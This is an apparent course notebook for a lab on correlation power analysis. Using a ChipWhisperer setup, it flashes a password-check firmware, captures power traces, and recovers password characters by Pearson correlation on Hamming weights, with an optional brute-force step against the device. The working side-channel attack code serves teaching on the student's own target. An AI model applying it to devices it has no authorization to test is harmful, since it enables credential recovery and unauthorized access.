# Lecture 4: Password CPA Attack - Attack

## Exercise 1

In [1]:
import pandas as pd
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook

output_notebook()

Loading BokehJS ...

In [2]:
import numpy as np

HW = [bin(n).count("1") for n in range(0, 256)]

def hw(n):
    if isinstance(n, str):
        return HW[ord(n)]
    return HW[n]

hw_vec = np.vectorize(hw)

def pearson(x, y):
    x_mean = np.mean(x)
    y_mean = np.mean(y)
    return sum((x - x_mean) * (y - y_mean)) / np.sqrt(sum((x - x_mean) ** 2) * sum((y - y_mean) ** 2))

In [5]:
import numpy as np
import bokeh.palettes
import bokeh.layouts
from bokeh.models import Label

size = 100
data = []
data.append(5 * np.array(range(size)) + np.random.uniform(-size/4, size/4, size=size))
data.append(np.array(range(size)) + np.random.uniform(-size/4, size/4, size=size) + 10)
data.append(-3 * np.array(range(size)) + np.random.uniform(-size/4, size/4, size=size) + 200)
data.append(100 * np.sin(np.array(range(size)) / size * np.pi) + np.random.uniform(-size/10, size/10, size=size))

plots = []

for i in range(len(data)):
    p = figure()
    plots.append(p)
    p.circle(
        range(size), 
        data[i], 
        color=bokeh.palettes.Set1_6[i],
        legend_label='pearson(range(size), data[{}]) = {:.3f}'.format(i, pearson(range(size), data[i]))
    )

show(bokeh.layouts.gridplot(children=plots, ncols=2, sizing_mode='scale_width', height=300))


## Exercise 2

In [6]:
def pearson_pointwise(traces, intermediates):
    intermediates_diff = intermediates - np.mean(intermediates)
    intermediates_sqrt = np.sqrt(np.sum(intermediates_diff ** 2))
    traces_diff = traces - np.mean(traces, axis=0)
    
    return np.sum(traces_diff * intermediates_diff[:, None], axis=0) / (
        np.sqrt(np.sum(traces_diff ** 2, axis=0)) * intermediates_sqrt
    )

In [20]:
import securec
from securec import util
scope, target = util.init()

See https://chipwhisperer.readthedocs.io/en/latest/api.html#firmware-update


In [21]:
securec.util.compile_and_flash('./4_password_fixed.c')

XMEGA Programming flash...
XMEGA Reading flash...
Verified flash OK, 2041 bytes
✓


In [24]:
import numpy as np

scope.default_setup()

def capture(attempt, samples=500):
    scope.adc.samples = samples
    if isinstance(attempt, str):
        attempt = attempt.encode('iso-8859-1')
    elif isinstance(attempt, int):
        attempt = bytes([attempt])
    scope.arm()
    target.simpleserial_write(0x01, attempt + b'\x00' * (10 - len(attempt)))
    result = target.simpleserial_read(0x01, 1)
    return np.array(util.capture()), not bool(result[0])


In [25]:
import random
import tqdm
import tqdm.notebook

trace_samples = 500
trace_nums = 1000

traces = []
attempts = []
for _ in tqdm.notebook.tqdm(range(trace_nums)):
    attempt = bytes([random.randint(0, 255) for _ in range(10)])
    traces.append(capture(attempt, samples=trace_samples)[0])
    attempts.append(attempt)
traces = np.array(traces)
attempts = np.array([list(a) for a in attempts])


  0%|          | 0/1000 [00:00<?, ?it/s]

ERROR:ChipWhisperer Target:Device did not ack


In [27]:
import itertools

def attack_cpa_bestof(attempts, traces, charlist='abcdefghijklmnopqrstuvwxyz', brute_force_rest=False):
    bestfits = []
    for idx in range(8):
        maxpearsons = []
        for guess in charlist:
            maxpearsons.append((max(abs(pearson_pointwise(traces, hw_vec(attempts[:, idx] ^ ord(guess))))), guess))
        maxchars = list(sorted(maxpearsons, reverse=True))
        bestfits.append(maxchars[:4])
        print(idx, maxchars[:4])

    if brute_force_rest:
        for attempt in tqdm.notebook.tqdm(itertools.product(*map(lambda maxchars: [b[1] for b in maxchars], bestfits))):
            attempt = ''.join(attempt)
            if capture(attempt)[1]:
                return attempt
    
attack_cpa_bestof(attempts, traces)

/tmp/ipykernel_356538/3214675746.py:6: RuntimeWarning: invalid value encountered in true_divide
  return np.sum(traces_diff * intermediates_diff[:, None], axis=0) / (


0 [(0.868010489766256, 'i'), (0.6984203757850378, 'm'), (0.6764400583074268, 'y'), (0.6574055689661595, 'h')]
1 [(0.7702789392644435, 'n'), (0.6276290007156238, 'i'), (0.5804460676695681, 'o'), (0.5758312859960866, 'j')]
2 [(0.8668304426541704, 'f'), (0.7267387518592181, 'g'), (0.6801539867221525, 'n'), (0.6533597629214027, 'v')]
3 [(0.7915718697435092, 'i'), (0.6470271724333567, 'e'), (0.6421487599024498, 'h'), (0.6193741214333814, 'm')]
4 [(0.8566407717096318, 'n'), (0.7392344948902381, 'o'), (0.6590189108181488, 'l'), (0.650867966773684, 'j')]
5 [(0.7637352141204037, 'e'), (0.6201168932362561, 'n'), (0.595415026174905, 'm'), (0.5793247104843389, 'd')]
6 [(0.5539042085795287, 'o'), (0.5278483641948174, 'm'), (0.4855915481236808, 'a'), (0.4356254924793364, 'k')]
7 [(0.7964464771904689, 'n'), (0.6996691752059717, 'o'), (0.6953047104335952, 'l'), (0.6883903769147975, 'm')]
